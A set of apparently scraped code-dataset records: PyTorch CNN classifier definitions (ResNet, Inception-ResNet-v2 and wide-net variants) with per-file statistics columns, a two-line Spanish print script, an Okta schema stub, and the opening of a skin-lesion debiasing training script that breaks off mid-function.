                nn.SELU(inplace=True),
                nn.MaxPool2d(kernel_size=(2, 2), stride=2),
            ]
        # Final convs and global average pooling (fully convolutional head).
        stages += [
            nn.Conv2d(64, 128, kernel_size=(5, 5), stride=1),
            nn.SELU(inplace=True),
            nn.Conv2d(128, num_classes, kernel_size=(1, 1), stride=1),
            nn.SELU(inplace=True),
            nn.AdaptiveAvgPool2d(1),
        ]
        self.net = nn.Sequential(*stages)
        self._initialize_weights()

    def forward(self, x):
        """Return squeezed class scores (spatial dims collapsed to 1x1)."""
        return self.net(x).squeeze()
class ResNetFC(nn.Module):
    """ResNet backbone with a fully convolutional classifier head.

    Replaces the usual fc layer with a 1x1 conv + BN + global pooling,
    so class scores can be computed for variable input sizes.
    """

    def __init__(self, block, layers, num_classes=1000, load_resnet='resnet18', pool_type='avg'):
        # block: residual block class with an `expansion` attribute
        #   (torchvision BasicBlock/Bottleneck style — TODO confirm callers);
        # layers: blocks per stage; load_resnet: key into the module-level
        # `resnets` factory dict, or None to skip weight transfer;
        # pool_type: 'max' for AdaptiveMaxPool2d, anything else -> avg pool.
        self.inplanes = 64
        super(ResNetFC, self).__init__()
        self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
                               bias=False)
        self.bn1 = nn.BatchNorm2d(64)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        self.layer1 = self._make_layer(block, 64, layers[0])
        self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
        self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
        self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
        # 1x1 conv projects backbone features straight to class scores.
        self.project = nn.Conv2d(
            512*block.expansion, num_classes,
            kernel_size=(1, 1), stride=(1, 1), padding=(0, 0),
            bias=True)
        self.bn2 = nn.BatchNorm2d(num_classes)
        # NOTE: the attribute is named `avgpool` even when max pooling is
        # selected, so pretrained key matching stays consistent.
        if pool_type == 'max':
            self.avgpool = nn.AdaptiveMaxPool2d(1)
        else:
            self.avgpool = nn.AdaptiveAvgPool2d(1)
        # He-style init for convs, unit/zero init for batch norms.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
        if load_resnet is not None:
            # Copy matching pretrained weights; keys absent from this model
            # (e.g. the original fc layer) are filtered out.
            resnet = resnets[load_resnet]()
            keys = set(self.state_dict().keys())
            state_dict = self.state_dict()
            state_dict.update(dict([(k, v) for (k, v) in resnet.state_dict().items() if k in keys]))
            self.load_state_dict(state_dict)

    def _make_layer(self, block, planes, blocks, stride=1):
        # Torchvision-style stage builder: first block may downsample,
        # remaining blocks keep the (expanded) channel count.
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = []
        layers.append(block(self.inplanes, planes, stride, downsample))
        self.inplanes = planes * block.expansion
        for i in range(1, blocks):
            layers.append(block(self.inplanes, planes))
        return nn.Sequential(*layers)

    def forward(self, x):
        """Return squeezed class scores for input images x."""
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        x = self.project(x)
        x = self.bn2(x)
        x = self.relu(x)
        x = self.avgpool(x)
        return x.squeeze()
class ResNetX(nn.Module):
    """ResNet trunk with a two-layer MLP head (512 -> num_classes).

    Args:
        block: residual block class exposing an ``expansion`` attribute.
        layers: number of blocks in each of the four stages.
        num_classes: size of the final classification layer.
        load_resnet: key into the module-level ``resnets`` factory dict from
            which matching pretrained weights are copied, or ``None`` to skip.
        pool_type: 'max' for adaptive max pooling, anything else -> average.
    """

    def __init__(self, block, layers, num_classes=1000, load_resnet='resnet18', pool_type='avg'):
        self.inplanes = 64
        super(ResNetX, self).__init__()
        # Standard ResNet stem: 7x7 conv, BN, ReLU, 3x3 max pool.
        self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
                               bias=False)
        self.bn1 = nn.BatchNorm2d(64)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        self.layer1 = self._make_layer(block, 64, layers[0])
        self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
        self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
        self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
        if pool_type == 'max':
            self.avgpool = nn.AdaptiveMaxPool2d(1)
        else:
            self.avgpool = nn.AdaptiveAvgPool2d(1)
        self.fc1 = nn.Linear(512 * block.expansion, 512)
        # BUGFIX: fc1 emits a 2-D (batch, 512) tensor, so the normalisation
        # must be BatchNorm1d -- BatchNorm2d raises "expected 4D input" at
        # runtime. Parameter/buffer shapes are unchanged ([512] each).
        self.bn2 = nn.BatchNorm1d(512)
        self.fc2 = nn.Linear(512, num_classes)
        # He initialisation for convs, unit-gamma/zero-beta for 2-D batch norm
        # (bn2 keeps PyTorch's identical default init).
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
        if load_resnet is not None:
            # Copy every pretrained tensor whose key exists in this model.
            resnet = resnets[load_resnet]()
            state_dict = self.state_dict()
            state_dict.update({k: v for k, v in resnet.state_dict().items() if k in state_dict})
            self.load_state_dict(state_dict)

    def _make_layer(self, block, planes, blocks, stride=1):
        """Build one residual stage; the first block may downsample."""
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = [block(self.inplanes, planes, stride, downsample)]
        self.inplanes = planes * block.expansion
        for _ in range(1, blocks):
            layers.append(block(self.inplanes, planes))
        return nn.Sequential(*layers)

    def forward(self, x):
        """Stem -> 4 stages -> global pool -> fc1/BN/ReLU -> fc2 logits."""
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        x = self.avgpool(x)
        # NOTE: squeeze() also drops the batch dim when batch size is 1.
        x = self.fc1(x.squeeze())
        x = self.bn2(x)
        x = self.relu(x)
        x = self.fc2(x)
        return x
class InceptionResNetV2fc(nn.Module):
    """Inception-ResNet-v2 trunk with a fully convolutional 1x1 head.

    Block counts of the three repeated sections are configurable; the head
    projects the 1536-channel feature maps straight to ``num_classes``.
    """

    # Ordered module names applied in sequence by `features`.
    _FEATURE_PIPELINE = (
        'conv2d_1a', 'conv2d_2a', 'conv2d_2b', 'maxpool_3a',
        'conv2d_3b', 'conv2d_4a', 'maxpool_5a', 'mixed_5b',
        'repeat', 'mixed_6a', 'repeat_1', 'mixed_7a',
        'repeat_2', 'block8', 'conv2d_7b',
    )

    def __init__(self, num_classes=1001, nun_block35=10, num_block17=20, num_block8=9):
        super(InceptionResNetV2fc, self).__init__()
        # Stem
        self.conv2d_1a = BasicConv2d(3, 32, kernel_size=3, stride=2)
        self.conv2d_2a = BasicConv2d(32, 32, kernel_size=3, stride=1)
        self.conv2d_2b = BasicConv2d(32, 64, kernel_size=3, stride=1, padding=1)
        self.maxpool_3a = nn.MaxPool2d(3, stride=2)
        self.conv2d_3b = BasicConv2d(64, 80, kernel_size=1, stride=1)
        self.conv2d_4a = BasicConv2d(80, 192, kernel_size=3, stride=1)
        self.maxpool_5a = nn.MaxPool2d(3, stride=2)
        # Inception-ResNet sections with their residual scaling factors.
        self.mixed_5b = Mixed_5b()
        self.repeat = nn.Sequential(*(Block35(scale=0.17) for _ in range(nun_block35)))
        self.mixed_6a = Mixed_6a()
        self.repeat_1 = nn.Sequential(*(Block17(scale=0.10) for _ in range(num_block17)))
        self.mixed_7a = Mixed_7a()
        self.repeat_2 = nn.Sequential(*(Block8(scale=0.20) for _ in range(num_block8)))
        self.block8 = Block8(noReLU=True)
        self.conv2d_7b = BasicConv2d(2080, 1536, kernel_size=1, stride=1)
        # Fully convolutional classification head.
        self.project = nn.Conv2d(
            1536, num_classes,
            kernel_size=(1, 1), stride=(1, 1), padding=(0, 0),
            bias=True)
        self.bn2 = nn.BatchNorm2d(num_classes)
        self.avgpool = nn.AdaptiveAvgPool2d(1)
        self.relu = nn.ReLU(inplace=True)

    def features(self, input):
        """Map an RGB batch to 1536-channel feature maps."""
        x = input
        for name in self._FEATURE_PIPELINE:
            x = getattr(self, name)(x)
        return x

    def logits(self, features):
        """1x1 projection, BN, ReLU, then global average pool to logits."""
        out = self.relu(self.bn2(self.project(features)))
        return self.avgpool(out).squeeze()

    def forward(self, input):
        return self.logits(self.features(input))
class InceptionResNetV2fcSmall(nn.Module):
    """Truncated Inception-ResNet-v2 (up to the Block17 section) with a
    fully convolutional 1x1 head over the 1088-channel feature maps."""

    # Ordered module names applied in sequence by `features`.
    _FEATURE_PIPELINE = (
        'conv2d_1a', 'conv2d_2a', 'conv2d_2b', 'maxpool_3a',
        'conv2d_3b', 'conv2d_4a', 'maxpool_5a', 'mixed_5b',
        'repeat', 'mixed_6a', 'repeat_1',
    )

    def __init__(self, num_classes=1001, nun_block35=10, num_block17=20):
        super(InceptionResNetV2fcSmall, self).__init__()
        # Stem
        self.conv2d_1a = BasicConv2d(3, 32, kernel_size=3, stride=2)
        self.conv2d_2a = BasicConv2d(32, 32, kernel_size=3, stride=1)
        self.conv2d_2b = BasicConv2d(32, 64, kernel_size=3, stride=1, padding=1)
        self.maxpool_3a = nn.MaxPool2d(3, stride=2)
        self.conv2d_3b = BasicConv2d(64, 80, kernel_size=1, stride=1)
        self.conv2d_4a = BasicConv2d(80, 192, kernel_size=3, stride=1)
        self.maxpool_5a = nn.MaxPool2d(3, stride=2)
        # Truncated Inception-ResNet trunk (ends after the Block17 section).
        self.mixed_5b = Mixed_5b()
        self.repeat = nn.Sequential(*(Block35(scale=0.17) for _ in range(nun_block35)))
        self.mixed_6a = Mixed_6a()
        self.repeat_1 = nn.Sequential(*(Block17(scale=0.10) for _ in range(num_block17)))
        # Fully convolutional classification head over 1088 channels.
        self.project = nn.Conv2d(
            1088, num_classes,
            kernel_size=(1, 1), stride=(1, 1), padding=(0, 0),
            bias=True)
        self.bn2 = nn.BatchNorm2d(num_classes)
        self.avgpool = nn.AdaptiveAvgPool2d(1)
        self.relu = nn.ReLU(inplace=True)

    def features(self, input):
        """Map an RGB batch to 1088-channel feature maps."""
        x = input
        for name in self._FEATURE_PIPELINE:
            x = getattr(self, name)(x)
        return x

    def logits(self, features):
        """1x1 projection, BN, ReLU, then global average pool to logits."""
        out = self.relu(self.bn2(self.project(features)))
        return self.avgpool(out).squeeze()

    def forward(self, input):
        return self.logits(self.features(input))
class FatNet1(nn.Module):
    """Plain wide CNN: six conv/BN/ReLU stages with interleaved max pooling
    and a final global average pool, followed by a three-layer MLP
    classifier with dropout.

    Args:
        num_classes: size of the final classification layer.
    """

    def _initialize_weights(self):
        """He init for convs, N(0, 0.01) for linears, identity for BN."""
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
                if m.bias is not None:
                    m.bias.data.zero_()
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
            elif isinstance(m, nn.Linear):
                m.weight.data.normal_(0, 0.01)
                if m.bias is not None:
                    m.bias.data.zero_()

    def __init__(self, num_classes=10):
        super(FatNet1, self).__init__()
        self.features = nn.Sequential(
            nn.Conv2d(3, 128, 11, stride=1, bias=False),
            nn.BatchNorm2d(128),
            nn.ReLU(),
            nn.MaxPool2d(2, 2),
            nn.Conv2d(128, 256, 7, stride=1, bias=False),
            nn.BatchNorm2d(256),
            nn.ReLU(),
            nn.MaxPool2d(2, 2),
            nn.Conv2d(256, 512, 5, stride=1, bias=False),
            nn.BatchNorm2d(512),
            nn.ReLU(),
            nn.MaxPool2d(2, 2),
            nn.Conv2d(512, 1024, 3, stride=1, bias=False),
            nn.BatchNorm2d(1024),
            nn.ReLU(),
            nn.MaxPool2d(2, 2),
            nn.Conv2d(1024, 2048, 1, stride=1, bias=False),
            nn.BatchNorm2d(2048),
            nn.ReLU(),
            nn.MaxPool2d(2, 2),
            nn.Conv2d(2048, 4096, 3, stride=1, bias=False),
            nn.BatchNorm2d(4096),
            nn.ReLU(),
            nn.AdaptiveAvgPool2d(1)
        )
        self.classifier = nn.Sequential(
            nn.Dropout(0.5),
            nn.Linear(4096, 2048, bias=False),
            nn.BatchNorm1d(2048),
            nn.ReLU(),
            nn.Dropout(0.5),
            nn.Linear(2048, 1024, bias=False),
            nn.BatchNorm1d(1024),
            nn.ReLU(),
            nn.Linear(1024, num_classes, bias=True)
        )
        self._initialize_weights()

    def forward(self, x):
        x = self.features(x)
        # BUGFIX: flatten instead of squeeze() -- squeeze() also collapsed
        # the batch dimension when batch size was 1, making the classifier's
        # BatchNorm1d fail. flatten(x, 1) is identical for batch size > 1.
        x = torch.flatten(x, 1)
        x = self.classifier(x)
        return x
class InceptionResNetV2(nn.Module):
    """Full Inception-ResNet-v2 with the standard linear classifier head.

    Expects 299x299 RGB input (see ``input_size``); the repeated sections
    use the canonical 10/20/9 block counts.
    """

    # Ordered module names applied in sequence by `features`.
    _FEATURE_PIPELINE = (
        'conv2d_1a', 'conv2d_2a', 'conv2d_2b', 'maxpool_3a',
        'conv2d_3b', 'conv2d_4a', 'maxpool_5a', 'mixed_5b',
        'repeat', 'mixed_6a', 'repeat_1', 'mixed_7a',
        'repeat_2', 'block8', 'conv2d_7b',
    )

    def __init__(self, num_classes=1001):
        super(InceptionResNetV2, self).__init__()
        # Special attributes consumed by external preprocessing code.
        self.input_space = None
        self.input_size = (299, 299, 3)
        self.mean = None
        self.std = None
        # Stem
        self.conv2d_1a = BasicConv2d(3, 32, kernel_size=3, stride=2)
        self.conv2d_2a = BasicConv2d(32, 32, kernel_size=3, stride=1)
        self.conv2d_2b = BasicConv2d(32, 64, kernel_size=3, stride=1, padding=1)
        self.maxpool_3a = nn.MaxPool2d(3, stride=2)
        self.conv2d_3b = BasicConv2d(64, 80, kernel_size=1, stride=1)
        self.conv2d_4a = BasicConv2d(80, 192, kernel_size=3, stride=1)
        self.maxpool_5a = nn.MaxPool2d(3, stride=2)
        # Inception-ResNet sections with their residual scaling factors.
        self.mixed_5b = Mixed_5b()
        self.repeat = nn.Sequential(*(Block35(scale=0.17) for _ in range(10)))
        self.mixed_6a = Mixed_6a()
        self.repeat_1 = nn.Sequential(*(Block17(scale=0.10) for _ in range(20)))
        self.mixed_7a = Mixed_7a()
        self.repeat_2 = nn.Sequential(*(Block8(scale=0.20) for _ in range(9)))
        self.block8 = Block8(noReLU=True)
        self.conv2d_7b = BasicConv2d(2080, 1536, kernel_size=1, stride=1)
        # Classification head: 8x8 average pool then a linear layer.
        self.avgpool_1a = nn.AvgPool2d(8, count_include_pad=False)
        self.last_linear = nn.Linear(1536, num_classes)

    def features(self, input):
        """Map an RGB batch to 1536-channel feature maps."""
        x = input
        for name in self._FEATURE_PIPELINE:
            x = getattr(self, name)(x)
        return x

    def logits(self, features):
        """Average pool, flatten, and classify the feature maps."""
        pooled = self.avgpool_1a(features)
        flat = pooled.view(pooled.size(0), -1)
        return self.last_linear(flat)

    def forward(self, input):
        return self.logits(self.features(input))
class ResNetDenseFC(nn.Module):
    """ResNet trunk whose four stage outputs are pooled to a common spatial
    resolution, concatenated (64+128+256+512 = 960 channels for
    expansion == 1) and classified by a 1x1 conv head with global pooling."""

    def __init__(self, block, layers, num_classes=1000, load_resnet='resnet18', zero_first_center=False):
        self.zero_first_center = zero_first_center
        self.inplanes = 64
        super(ResNetDenseFC, self).__init__()
        # Standard ResNet stem.
        self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
                               bias=False)
        self.bn1 = nn.BatchNorm2d(64)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        self.layer1 = self._make_layer(block, 64, layers[0])
        self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
        self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
        self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
        self.avgpool = nn.AdaptiveAvgPool2d(1)
        # Pools that bring layer1/2/3 down to layer4's spatial resolution.
        self.maxpool8 = nn.MaxPool2d(8, stride=8)
        self.maxpool4 = nn.MaxPool2d(4, stride=4)
        self.maxpool2 = nn.MaxPool2d(2, stride=2)
        self.project = nn.Conv2d(
            960, num_classes,
            kernel_size=(1, 1), stride=(1, 1), padding=(0, 0),
            bias=True)
        self.bn2 = nn.BatchNorm2d(num_classes)
        # He initialisation for convs, identity for batch norm.
        for mod in self.modules():
            if isinstance(mod, nn.Conv2d):
                fan_out = mod.kernel_size[0] * mod.kernel_size[1] * mod.out_channels
                mod.weight.data.normal_(0, math.sqrt(2. / fan_out))
            elif isinstance(mod, nn.BatchNorm2d):
                mod.weight.data.fill_(1)
                mod.bias.data.zero_()
        if load_resnet is not None:
            # Copy every pretrained tensor whose key exists in this model.
            pretrained = resnets[load_resnet]()
            own = self.state_dict()
            own.update({k: v for k, v in pretrained.state_dict().items() if k in own})
            self.load_state_dict(own)

    def _make_layer(self, block, planes, blocks, stride=1):
        """Build one residual stage; the first block may downsample."""
        out_channels = planes * block.expansion
        shortcut = None
        if stride != 1 or self.inplanes != out_channels:
            shortcut = nn.Sequential(
                nn.Conv2d(self.inplanes, out_channels,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(out_channels),
            )
        stage = [block(self.inplanes, planes, stride, shortcut)]
        self.inplanes = out_channels
        stage.extend(block(self.inplanes, planes) for _ in range(blocks - 1))
        return nn.Sequential(*stage)

    def forward(self, x):
        if self.zero_first_center:
            # NOTE(review): zeroes the centre tap of conv1's 7x7 kernels on
            # every forward pass by writing through the state_dict view.
            self.state_dict()['conv1.weight'][:, :, 3, 3] = 0.0
        x = self.maxpool(self.relu(self.bn1(self.conv1(x))))
        f1 = self.layer1(x)
        f2 = self.layer2(f1)
        f3 = self.layer3(f2)
        f4 = self.layer4(f3)
        # Bring every stage to layer4's resolution before concatenating.
        fused = torch.cat(
            [self.maxpool8(f1), self.maxpool4(f2), self.maxpool2(f3), f4], dim=1)
        fused = self.relu(self.bn2(self.project(fused)))
        # NOTE(review): squeeze() also drops the batch dim when batch size is 1.
        return self.avgpool(fused).squeeze()
class ResNetDense(nn.Module):
    """ResNet trunk whose four stage outputs are pooled to a common spatial
    resolution, concatenated (960 channels for expansion == 1), globally
    pooled, and classified by a single linear layer."""

    def __init__(self, block, layers, num_classes=1000, load_resnet='resnet18'):
        self.inplanes = 64
        super(ResNetDense, self).__init__()
        # Standard ResNet stem.
        self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
                               bias=False)
        self.bn1 = nn.BatchNorm2d(64)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        self.layer1 = self._make_layer(block, 64, layers[0])
        self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
        self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
        self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
        self.avgpool = nn.AdaptiveAvgPool2d(1)
        # Pools that bring layer1/2/3 down to layer4's spatial resolution.
        self.maxpool8 = nn.MaxPool2d(8, stride=8)
        self.maxpool4 = nn.MaxPool2d(4, stride=4)
        self.maxpool2 = nn.MaxPool2d(2, stride=2)
        self.fc_new = nn.Linear(960, num_classes)
        # He initialisation for convs, identity for batch norm.
        for mod in self.modules():
            if isinstance(mod, nn.Conv2d):
                fan_out = mod.kernel_size[0] * mod.kernel_size[1] * mod.out_channels
                mod.weight.data.normal_(0, math.sqrt(2. / fan_out))
            elif isinstance(mod, nn.BatchNorm2d):
                mod.weight.data.fill_(1)
                mod.bias.data.zero_()
        if load_resnet is not None:
            # Copy every pretrained tensor whose key exists in this model.
            pretrained = resnets[load_resnet]()
            own = self.state_dict()
            own.update({k: v for k, v in pretrained.state_dict().items() if k in own})
            self.load_state_dict(own)

    def _make_layer(self, block, planes, blocks, stride=1):
        """Build one residual stage; the first block may downsample."""
        out_channels = planes * block.expansion
        shortcut = None
        if stride != 1 or self.inplanes != out_channels:
            shortcut = nn.Sequential(
                nn.Conv2d(self.inplanes, out_channels,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(out_channels),
            )
        stage = [block(self.inplanes, planes, stride, shortcut)]
        self.inplanes = out_channels
        stage.extend(block(self.inplanes, planes) for _ in range(blocks - 1))
        return nn.Sequential(*stage)

    def forward(self, x):
        x = self.maxpool(self.relu(self.bn1(self.conv1(x))))
        f1 = self.layer1(x)
        f2 = self.layer2(f1)
        f3 = self.layer3(f2)
        f4 = self.layer4(f3)
        # Bring every stage to layer4's resolution before concatenating.
        fused = torch.cat(
            [self.maxpool8(f1), self.maxpool4(f2), self.maxpool2(f3), f4], dim=1)
        pooled = self.avgpool(fused)
        # NOTE(review): squeeze() also drops the batch dim when batch size is 1.
        return self.fc_new(pooled.squeeze())
| 34.85056
| 113
| 0.548008
| 3,702
| 27,985
| 4.007023
| 0.062939
| 0.037751
| 0.035594
| 0.022246
| 0.829648
| 0.808278
| 0.778212
| 0.751921
| 0.738102
| 0.729068
| 0
| 0.077896
| 0.319242
| 27,985
| 803
| 114
| 34.85056
| 0.700751
| 0.001465
| 0
| 0.728916
| 0
| 0
| 0.005727
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057229
| false
| 0
| 0.012048
| 0
| 0.118976
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52a8cb7cfb37390bd4219947910258a280a171b7
| 182
|
py
|
Python
|
Bucles.py
|
jayounghoyos/My-Scripts
|
da7f3d39e0a19b4d01b5cef0627bbf892f655c80
|
[
"MIT"
] | null | null | null |
Bucles.py
|
jayounghoyos/My-Scripts
|
da7f3d39e0a19b4d01b5cef0627bbf892f655c80
|
[
"MIT"
] | null | null | null |
Bucles.py
|
jayounghoyos/My-Scripts
|
da7f3d39e0a19b4d01b5cef0627bbf892f655c80
|
[
"MIT"
] | null | null | null |
# Earlier variant kept for reference: printed the power for exponent 0.
# contador = 0
# print("2 elevado a la" + str(contador) + " es igual a: " + str(2**contador))
contador = 1
print(f"2 elevado a la{contador} es igual a: {2**contador}")
| 36.4
| 77
| 0.615385
| 30
| 182
| 3.733333
| 0.366667
| 0.107143
| 0.232143
| 0.25
| 0.839286
| 0.839286
| 0.839286
| 0.839286
| 0.839286
| 0.839286
| 0
| 0.040541
| 0.186813
| 182
| 5
| 78
| 36.4
| 0.716216
| 0.483516
| 0
| 0
| 0
| 0
| 0.290323
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
d80bd2bee57f097beb7da8e26adc0fee8e4645af
| 120
|
py
|
Python
|
okta/models/schema/AppUserProfileCustomSubschema.py
|
CloudRunnerInc/oktasdk-python
|
b2d19418d2bd0a8c1bbf3764a69e83c148e42a41
|
[
"Apache-2.0"
] | null | null | null |
okta/models/schema/AppUserProfileCustomSubschema.py
|
CloudRunnerInc/oktasdk-python
|
b2d19418d2bd0a8c1bbf3764a69e83c148e42a41
|
[
"Apache-2.0"
] | 3
|
2018-01-05T20:23:12.000Z
|
2019-03-06T12:00:58.000Z
|
okta/models/schema/AppUserProfileCustomSubschema.py
|
CloudRunnerInc/oktasdk-python
|
b2d19418d2bd0a8c1bbf3764a69e83c148e42a41
|
[
"Apache-2.0"
] | 1
|
2019-10-23T04:24:49.000Z
|
2019-10-23T04:24:49.000Z
|
from okta.models.schema import BaseCustomSubschema
class AppUserProfileCustomSubschema(BaseCustomSubschema):
    """Custom (user-defined) subschema of an Okta app-user profile.

    Adds no behavior of its own; it exists so the app-user variant has a
    distinct type from other BaseCustomSubschema subclasses.
    """
    pass
| 20
| 57
| 0.85
| 10
| 120
| 10.2
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108333
| 120
| 5
| 58
| 24
| 0.953271
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
dc4a855b09308772dc6825454d1a0894acd021ca
| 28,754
|
py
|
Python
|
train_epoch_variations.py
|
pbevan1/Skin-Deep-Unlearning
|
b8802db8bd61bbf3fdeb10c9899a4117ae38e89c
|
[
"MIT"
] | 3
|
2021-09-10T21:51:01.000Z
|
2022-03-29T15:16:03.000Z
|
train_epoch_variations.py
|
pbevan1/Skin-Deep-Unlearning
|
b8802db8bd61bbf3fdeb10c9899a4117ae38e89c
|
[
"MIT"
] | null | null | null |
train_epoch_variations.py
|
pbevan1/Skin-Deep-Unlearning
|
b8802db8bd61bbf3fdeb10c9899a4117ae38e89c
|
[
"MIT"
] | null | null | null |
import numpy as np
from sklearn.metrics import roc_auc_score, accuracy_score
import torch
import torch.nn as nn
from torch.autograd import Variable
from globalbaz import args, DP, device
from tqdm import tqdm
from models import *
# Defining criterion with weighted loss based on bias to be unlearned
def criterion_func(df):
    """Build the main and two auxiliary loss functions.

    The auxiliary heads are weighted by normalised inverse class frequency of
    the bias labels found in `df` (columns 'instrument', 'marked', 'scale' —
    which pair is used depends on the args flags).

    Args:
        df: dataframe holding the bias label columns.

    Returns:
        (criterion, criterion_aux, criterion_aux2): main BCE-with-logits loss
        and the two weighted cross-entropy losses for the auxiliary heads.
    """
    # BUGFIX: the combined instrument+rulers case must be tested FIRST.
    # The original order (`if args.instrument: ... elif args.instrument and
    # args.rulers: ...`) made the combined branch unreachable.
    if args.instrument and args.rulers:
        lst = df['instrument'].value_counts().sort_index().tolist()
        lst2 = df['scale'].value_counts().sort_index().tolist()
    elif args.instrument:
        lst = df['instrument'].value_counts().sort_index().tolist()
        lst2 = df['marked'].value_counts().sort_index().tolist()
    else:
        lst = df['marked'].value_counts().sort_index().tolist()
        lst2 = df['scale'].value_counts().sort_index().tolist()  # placeholder

    def _inverse_freq(counts):
        # percentage frequency -> normalise -> invert -> normalise again,
        # matching the original weighting scheme exactly.
        total = sum(counts)
        w = torch.tensor([c / total * 100 for c in counts], dtype=torch.float32)
        w = w / w.sum()
        w = 1.0 / w
        return w / w.sum()

    weights = _inverse_freq(lst)
    weights2 = _inverse_freq(lst2)
    if args.debias_config != 'baseline':  # Only printing auxiliary head weights if using debiasing head
        print(f'weights_aux: {weights}')
        print(f'weights_aux_2: {weights2}')
    weights = weights.to(device)
    weights2 = weights2.to(device)
    # Note CrossEntropyLoss & BCEWithLogitsLoss include the softmax/sigmoid,
    # so logits should be passed in (no softmax layer in the model).
    criterion = nn.BCEWithLogitsLoss()
    criterion_aux = nn.CrossEntropyLoss(weight=weights)
    criterion_aux2 = nn.CrossEntropyLoss(weight=weights2)
    return criterion, criterion_aux, criterion_aux2
# Defining one training epoch for baseline model
def train_epoch_baseline(model_encoder, model_classifier, loader, optimizer, criterion):
    """Run one training epoch of the baseline (no-debiasing) model.

    Returns the list of per-batch training losses (numpy scalars).
    """
    model_encoder.train()
    model_classifier.train()
    losses = []
    progress = tqdm(loader)  # progress bar over batches
    for data, target, _, _ in progress:
        optimizer.zero_grad()
        data, target = data.to(device), target.to(device)
        # Encoder produces the feature representation; classifier maps it to logits.
        logits = model_classifier(model_encoder(data))
        # Match target shape/dtype to the logits for BCEWithLogitsLoss.
        loss = criterion(logits, target.unsqueeze(1).type_as(logits))
        loss.backward()
        optimizer.step()
        batch_loss = loss.detach().cpu().numpy()
        losses.append(batch_loss)
        # Smoothed loss over (at most) the last 100 batches for display.
        running = sum(losses[-100:]) / min(len(losses), 100)
        progress.set_description('loss: %.5f, smth: %.5f' % (batch_loss, running))
    return losses
# Defining one training epoch for learning not to learn model
def train_epoch_LNTL(model_encoder, model_classifier, model_aux, loader, optimizer, optimizer_aux, criterion, criterion_aux):
    """Run one 'Learning Not To Learn' training epoch.

    Two alternating updates per batch: (1) main head with an entropy-based
